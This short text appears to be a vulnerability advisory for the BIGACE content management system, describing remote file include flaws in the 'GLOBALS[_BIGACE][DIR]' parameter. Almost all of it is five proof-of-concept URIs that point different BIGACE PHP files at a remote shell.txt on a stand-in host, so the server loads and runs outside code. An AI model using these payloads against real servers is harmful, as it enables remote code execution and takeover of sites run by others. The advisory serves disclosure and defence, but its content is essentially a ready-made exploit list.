BIGACE 'GLOBALS[_BIGACE][DIR]' Parameter Multiple Remote File Include Vulnerabilities

BIGACE 'GLOBALS[_BIGACE][DIR]' Parameter Multiple Remote File Include Vulnerabilities

Attackers can exploit these issues via a browser.

The following proof-of-concept URIs are available:
http://www.example.com/bigace/addon/smarty/plugins/function.captcha.php?GLOBALS[_BIGACE][DIR][addon]=http://www.example2.com/shell.txt?
http://www.example.com/bigace/system/application/util/item_information.php?GLOBALS[_BIGACE][DIR][admin]=http://www.example2.com/shell.txt?
http://www.example.com/bigace/system/application/util/jstree.php?GLOBALS[_BIGACE][DIR][admin]=http://www.example2.com/shell.txt?
http://www.example.com/bigace/system/classes/sql/AdoDBConnection.php?GLOBALS[_BIGACE][DIR][addon]=http://www.example2.com/shell.txt?
http://www.example.com/bigace/system/admin/plugins/menu/menuTree/plugin.php?GLOBALS[_BIGACE][DIR][admin]=http://www.example2.com/shell.txt?